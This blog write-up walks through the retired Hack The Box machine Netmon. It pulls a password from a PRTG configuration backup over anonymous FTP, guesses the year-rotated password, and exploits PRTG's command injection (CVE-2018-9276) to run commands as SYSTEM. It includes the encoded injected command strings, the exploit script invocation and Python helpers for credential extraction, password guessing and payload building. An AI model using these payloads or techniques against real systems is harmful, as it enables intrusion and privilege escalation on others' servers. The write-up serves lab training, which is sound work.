Hack The Box – Netmon Write-up By Nikhil Sahoo
So I'm back with a new blog post. Today we will walk through the Hack The Box machine Netmon, which retired very recently. It is a fairly easy Windows box: getting the user flag is trivial, and the root flag isn't much harder either. So let's begin.
We'll start our recon with an nmap scan.
The results show that port 21 (FTP) is open and that the server accepts anonymous logins; port 80 (HTTP) is open as well, which we come back to later.
So let's connect to the FTP server (the box is 10.10.10.152) and log in as anonymous with any password:
After logging in we can browse the directories and sub-directories; the FTP root maps to the C: drive, and the user flag, user.txt, sits inside "/Users/Public/".
We can download the user flag to our machine with a plain get:
Thus we got our user flag. Now let's hunt for the root flag.
We know from the scan that port 80 is also open, so let's open it in a browser.
It serves the login portal of PRTG Network Monitor, a network monitoring product from Paessler AG. You can find out more about the software by googling it; note the version string printed at the bottom of the login page, since it tells you which known bugs apply to this install.
Now we need to log in somehow, so let's explore the machine further over FTP. Back on the FTP server there is a directory named "ProgramData" (a hidden folder on Windows, but the FTP listing shows it). Move into it.
Inside we find a sub-directory named "Paessler", so move into that as well.
Inside that is a sub-directory named "PRTG Network Monitor" (mind the spaces when changing into it).
In there is a file named "PRTG Configuration.old.bak", an old backup of the PRTG configuration. Download it to your machine.
Now we can dig through the file on our machine. It is PRTG's configuration in XML form and is large, so rather than scrolling through it, search it for "prtgadmin" or "password". We find the username "prtgadmin" and the password "PrTg@dmin2018".
Now let's try these credentials on the login portal, but unfortunately they don't work. The file is an old backup and the password ends in a year, so the obvious guess is that the admin simply rotated the year: try "PrTg@dmin2019" and we are in.
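As an added example (my own code, not from the original post or from Paessler), here is how I would pull password-like elements out of the backup and generate the year-bumped guesses that lead to the working password. The backup excerpt inside the block is constructed to imitate the layout of a PRTG configuration file and is not the file from the box; element names like dbpassword and the "User:" comment are assumptions about that layout.

```python
import re
from typing import List, Tuple

# Constructed sample in the shape of a PRTG configuration backup (XML).
# This is NOT the real "PRTG Configuration.old.bak" from the box; only the
# layout of a password element preceded by a "User:" comment is imitated.
SAMPLE_BACKUP = """<?xml version="1.0" encoding="UTF-8"?>
<prtg>
  <data>
    <dbcredentials>
      <!-- Inheritance -->
      1
    </dbcredentials>
    <dbpassword>
      <!-- User: prtgadmin -->
      PrTg@dmin2018
    </dbpassword>
    <proxypassword>
    </proxypassword>
  </data>
</prtg>
"""

# Any element whose name contains "password", optionally preceded inside it by
# a "<!-- User: name -->" comment, holding a non-empty text value.
CRED_RE = re.compile(
    r"<(?P<tag>[A-Za-z0-9_]*password[A-Za-z0-9_]*)>\s*"
    r"(?:<!--\s*User:\s*(?P<user>[^\s>]+?)\s*-->)?\s*"
    r"(?P<value>[^<\s][^<]*?)\s*</(?P=tag)>",
    re.IGNORECASE | re.DOTALL,
)


def find_credentials(text: str) -> List[Tuple[str, str, str]]:
    """Return (element, user, password) for every password-like element that
    actually holds a value; user is '' when no User: comment names one.
    Empty elements such as <proxypassword></proxypassword> are skipped."""
    return [
        (m.group("tag").lower(), m.group("user") or "", m.group("value"))
        for m in CRED_RE.finditer(text)
    ]


YEAR_RE = re.compile(r"(?:19|20)\d{2}")


def year_variants(password: str, span: int = 2) -> List[str]:
    """If the password contains a four-digit year, return copies with the year
    shifted by -span..+span, oldest first, without the original itself.
    Passwords without a year give an empty list."""
    m = YEAR_RE.search(password)
    if not m:
        return []
    year = int(m.group(0))
    return [
        password[: m.start()] + str(year + delta) + password[m.end():]
        for delta in range(-span, span + 1)
        if delta != 0
    ]


if __name__ == "__main__":
    for element, user, pw in find_credentials(SAMPLE_BACKUP):
        print(f"{element}: user={user or '?'} password={pw}")
        for candidate in year_variants(pw, span=1):
            print("  try next:", candidate)
```

Run it against the real backup with `find_credentials(open(path, encoding="utf-8", errors="replace").read())`; the regex deliberately ignores empty password elements, which PRTG configs are full of, so only populated ones are reported.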
Googling the product and its version turns up a script for a known authenticated remote code execution bug in PRTG (CVE-2018-9276, a command injection through the parameter of the "Execute Program" notification, fixed in 18.2.39). The PRTG core service runs as SYSTEM, so whatever gets injected runs as SYSTEM too. Out of the box the script adds a user named "pentest" with the password "P3nT3st!" and puts it in the local Administrators group.
You can find the script here
We will use this script, but a small change is needed before running it.
First, find the request that creates the new user. Search the code for this string:
%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22 which decodes to "C:\Users\Public\tester.txt;net user pentest P3nT3st! /add".
Second, find the request that adds the new pentest user to the Administrators group. Search for this one as well:
%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22 which decodes to "C:\Users\Public\tester.txt;net localgroup administrators /add pentest".
Why this shape? The parameter is meant to be a file name: PRTG hands it to a PowerShell notification script that writes its output to that path. The ";" ends that PowerShell statement, and whatever follows runs as a second command with the PRTG service's privileges, i.e. as SYSTEM. The whole point here is that we don't want to create a user at all; we just need the root flag, root.txt, which lives in C:\Users\Administrator. So replace the net user / net localgroup command with "copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt". This copies the root flag from the Administrator directory into the Public directory, which we can already read over anonymous FTP.
Here is the final command:
"C:\Users\Public\tester.txt;copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt" which encodes to %22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bcopy%20C%3A%5CUsers%5CAdministrator%5Croot.txt%20C%3A%5CUsers%5CPublic%5Cnikhil.txt%22 (spaces are %20 here and + in the script's own strings; a form-encoded request accepts either).
Replace both of the strings we located earlier with this encoded one, so that neither net command is sent and the copy runs instead.
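As an added example, not taken from the exploit script or the original post: the payloads are hand-edited URL-encoded strings, and a typo in that encoding is the usual reason a modified payload silently does nothing. This Python helper builds the parameter from a plain command the same way the script encodes it, decodes the page's own strings back, and extracts the part that will actually run, so you can check a payload before sending it. The trigger file path and the choice to leave "!" unencoded are taken from the strings quoted above; the HTTP request that carries the parameter is left to the script.

```python
from urllib.parse import quote_plus, unquote_plus

# Path the notification script would write to anyway. It is the "legitimate"
# part of the parameter and keeps the PowerShell statement before our ';' valid.
TRIGGER_FILE = r"C:\Users\Public\tester.txt"

# The two encoded parameters quoted on this page, kept for comparison.
PAGE_ADD_USER = (
    "%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22"
)
PAGE_COPY_FLAG = (
    "%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bcopy%20C%3A%5CUsers%5CAdministrator"
    "%5Croot.txt%20C%3A%5CUsers%5CPublic%5Cnikhil.txt%22"
)


def build_parameter(command: str) -> str:
    """Form-encode '"<trigger file>;<command>"' the way the exploit script does.

    The double quotes keep PRTG treating the whole thing as one parameter, the
    ';' terminates the PowerShell statement that writes the trigger file, and
    'command' then runs as a second statement under the PRTG service account.
    '!' is left unencoded so the output matches the script's strings byte for
    byte (spaces become '+', everything else non-alphanumeric is %XX).
    """
    raw = f'"{TRIGGER_FILE};{command}"'
    return quote_plus(raw, safe="!")


def decode_parameter(encoded: str) -> str:
    """Decode an encoded parameter; '+' and '%20' both come back as a space."""
    return unquote_plus(encoded)


def injected_command(encoded: str) -> str:
    """Return only the attacker-controlled part after the ';' (outer quotes
    removed): read this back before firing a modified payload."""
    decoded = decode_parameter(encoded).strip('"')
    _, _, cmd = decoded.partition(";")
    return cmd


if __name__ == "__main__":
    flag_copy = r"copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt"
    print("encoded :", build_parameter(flag_copy))
    print("decoded :", decode_parameter(PAGE_COPY_FLAG))
    print("will run:", injected_command(PAGE_ADD_USER))
```

build_parameter produces "+" for spaces while the page's copy string uses "%20"; decode_parameter shows they are the same command, which is why both forms work in the script.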
We also need the session cookies. Log in to PRTG in the browser, press F12 for the developer tools, open the Network tab, select any request, open its Cookies tab and copy all the cookies. The OCTOPUS cookie is the PRTG session; the _ga and _gid ones are Google Analytics cookies that the script simply passes along. (The full usage syntax is in the script's GitHub repository as well.)
Here is the final command to execute; just replace the cookies with your own:
./prtg-exploit.sh -u http://10.10.10.152 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
Hopefully everything went right; let's check by going back to the box over FTP. Inside C:\Users\Public\ we should now find a text file named nikhil.txt. Download it and open it on your machine. If it never appears, the injected command did not run: test the injection first with a harmless command that writes a file into Public, and double-check the path to root.txt.
Thus we got the root flag and the box is done.
That's all for now. See you next time.
You can also have a look at my previous Hack The Box write-up, on Curling.